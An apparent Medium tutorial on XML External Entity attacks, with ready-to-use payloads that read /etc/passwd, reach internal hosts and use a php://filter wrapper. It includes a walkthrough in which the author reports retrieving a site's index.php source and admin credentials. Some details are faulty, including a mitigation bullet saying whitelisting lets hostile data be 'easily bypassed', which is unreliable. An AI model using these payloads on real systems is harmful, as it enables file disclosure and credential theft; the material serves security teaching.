Exploitation :XML External Entity (XXE)

INDEX

What is XXE

Types

Exploit XXE

Preventive Measures /Mitigation

What is XXE: An XML External Entity attack is a type of attack against an application that parses XML input. It often allows an attacker to view files on the application server file system, and to interact with any backend or external systems that the application itself can access.

In some cases, XXE can also be used to perform server-side request forgery, port scanning and remote code execution.

Ex: Consider a website www.toy.com that checks the product’s stock before adding it into the cart. The website uses Extensible Markup language(XML) inputs to submit and parse the request. The following request is used to check the product’s stock.

<?xml version=”1.0" encoding=”UTF-8"?>

<toyCheck><toyId>381</toyId></toyCheck>

If there is a weak XML parser which processes requests without any validation, so by modifying the original request and passing file(file:///) schema can fetch the sensitive files from the server.

Image for post
Image for post

Explanation:

· Initially attacker send a xml request to any web application. If XML parser processes requests without any validation, as it already happens.

· Now attacker modify the DTD (Document type definition) according to his needs, what he wants to fetch sensitive files from target server.

· Then modified request again sent to the server for fetching sensitive information

Types: There are various types of XXE attacks:

· Exploiting XXE to retrieve files: where we can use external which can fetch the sensitive files from the server.

Ex: Consider an application of construction where they have house id and application process data in XML.

<?xml version=”1.0" encoding=”UTF-8"?>
<ProjectId><HouseId>381</HouseId></ProjectId>

As web-application put no validation against XXE attacks and we want to retrieve all dir in the web application so we modify DTD.

<?xml version=”1.0" encoding=”UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM “file:///etc/passwd”> ]>

<ProjectId><HouseId>&xxe;</HouseId></ProjectId>

Note: Here &xxe;is variable which is used to echo the value of file schema.

After the execution of above command, XXE payload defines an external entity “&xxe;” whose value is the contents of the “/etc/passwd” file and uses the entity within the “projecteid” value.

· Exploiting XXE to perform SSRF attacks: where Server side application can make HTTP requests to any URL.

<!DOCTYPE testXXE [ <!ENTITY xxe SYSTEM “https//internal.testwebsite.com:1234/”> ]>

In above example “testXXE” is an external entity which try to connect “internal.testwebsite.com.

· Exploiting blind XXE exfiltrate data out-of-band: As in above 2 cases we are getting contents in response but in this we are not getting any response by which we can determine whether the XXE is possible or not.

· Exploiting blind XXE to retrieve data via error messages: where the attacker can trigger a parsing error message containing sensitive data. With the help of information, contain in error message we are trying to do XXE attacks.

Exploit XXE:

AIM: Our aim is to retrieve administrator password.

Here we take an example of website which is which have the functionality to check the RSS feed. As we all know that RSS feeds are made up of XML. So this is asking for a URL and after submitting the url it fetches the RSS feed and checks it validity by processing it.

Image for post
Image for post

XML POC

Now what we will do is, we will use a malicious RSS feed which actually have a external entity defined in it. The Entity on processing will show up the contents of /etc/passwd file.

<?xml version=”1.0" encoding=”UTF-8"?>

<!DOCTYPE title [ <!ELEMENT title ANY >

<!ENTITY xxe SYSTEM “file:///etc/passwd “ >]>

<rss version=”2.0" xmlns:atom=”http://www.w3.org/2005/Atom">

<channel>

<title>The Blog</title>

<item>

<title>&xxe;</title>

</item>

</channel>

</rss>

But in with above POC we were not able to get the XXE as it maybe blocking the file schema, so I modified external entity schema and used a php wrapper to fetch the index.php file. I uploaded this on github and on looking at its raw version got this url

<?xml version=”1.0" encoding=”UTF-8"?>

<!DOCTYPE title [ <!ELEMENT title ANY >

<!ENTITY xxe SYSTEM “php://filter/convert.base64-encode/resource=index.php” >]>

<rss version=”2.0" xmlns:atom=”http://www.w3.org/2005/Atom">

<channel>

<title>The Blog</title>

<item>

<title>&xxe;</title>

</item>

</channel>

</rss>

After submitting the URL “https://raw.githubusercontent.com/readacted/redacted/master/xml

This time we bypassed the filtration I got the contents of index.php file which is encoded in base64.

Image for post
Image for post

From browser I copied the encrypted string

I used burp suite to decode the string and got the source code of index.php

This whole string is encoded form of webpage which is developed in PHP

On burp

Image for post
Image for post

Note: Due to privacy issue I removed lots of decoded web page content.

And this page also have the admins credentials in it. PHP wrappers comes handy when simple file schema are blocked.

Preventive Measures /Mitigation

· Disable Document type definition (DTD).If it is not possible to disable DTDs completely, then external entities and external document type declarations must be disabled in the way that’s specific to each parser.

· Implement white listing policy for hostile XMS data, So that these data can be easily bypassed.

· Validate file uploads vulnerability from where we can upload xml data.

· Try to use updated version of XML processors so that there are less chance of bypass.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store